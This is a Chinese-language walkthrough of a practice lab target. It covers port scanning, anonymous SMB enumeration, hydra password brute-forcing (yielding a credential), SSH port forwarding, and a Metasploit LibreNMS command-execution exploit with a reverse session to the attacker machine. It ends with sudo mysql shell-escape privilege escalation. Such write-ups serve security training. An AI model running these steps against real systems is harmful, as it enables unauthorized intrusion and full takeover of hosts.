信息收集
主机发现
kali ip:192.168.233.128
靶机ip:192.168.233.141
端口扫描
nmap -Pn -sV -p- -A 192.168.233.141
靶机开放了21 22 80 139 445端口
访问80端口,发现只有图片
目录爆破
并没发现了有用的东西
查看共享文件夹
smbclient -L 192.168.233.141
发现anonymous共享文件夹
查看anonymous 文件夹
smbclient //192.168.233.141/anonymous
发现一个log.txt 文件,下载下来看一下
get log.txt
cat log.txt
发现了一个叫aeolus 的用户
知道用户名之后, 可也尝试使用hydra 进行密码爆破
hydra -l aeolus -U /usr/share/wordlists/rockyou.txt ftp://192.168.233.141
爆破成功!拿到了账密:aeolus \ sergioteamo
使用爆破出来的账密进行ssh 登录
ssh aeolus@192.168.233.141
登录成功!
使用SSH登录的情况下会对很多命令有限制
知道了账号密码,那就使用msf 工具进行SSH登录启动metasploit 工具
msfconsole
查找ssh 登录模块
search ssh_login
使用第一个
use 0
查看一下需要设置那些选项
show options
sessions 将sessions 会话升级为一个meterpreter会话 查看sessions 会话
sessions -u 1 升级会话 使用第二个会话
查看网络相关信息
netstat
发现8080端口只允许靶机本身连接
端口转发
将本地的9999端口映射到靶机的8080端口
ssh -Nf -L 8888:127.0.0.1:8080 aeolus@192.168.233.141
ssh: 调用SSH客户端。
-N: 不执行远程命令,仅用于端口转发。
-f: 在后台运行SSH客户端。
-L 8888:127.0.0.1:8080: 本地端口转发,格式为 local_port:remote_address:remote_port。将本地的 8888 端口转发到远程主机的 127.0.0.1:8080。
aeolus@192.168.233.141: 连接到远程主机 192.168.233.141 上的用户 aeolus。
将本地机器的8888端口映射到远程机器的127.0.0.1的8080端口 执行此命令后,本地机器的8888端口将被转发到远程机器的8080端口。你可以通过在本地浏览器中访问http://localhost:8888来访问远程机器上的服务。
发现网站使用的是libreNMS 系统
使用msf 查看一下该系统是否存在漏洞
search libreNMS
发现两个命令执行漏洞
使用第一个
use 1
show options 查看一下需要设置的选项
set PASSWORD sergioteamo
set RHOSTS 127.0.0.1
set RPORT 8888
set USERNAME aeolus
set LHOST 192.168.233.128
run
利用成功!切换到Shell 模式
python -c “import pty;pty.spawn(‘/bin/bash’)”
提权
查看一下可以执行哪些特殊权限命令
sudo -l
发现可以用root 权限执行mysql
mysql 提权
sudo mysql -e '\! /bin/sh'
成功提权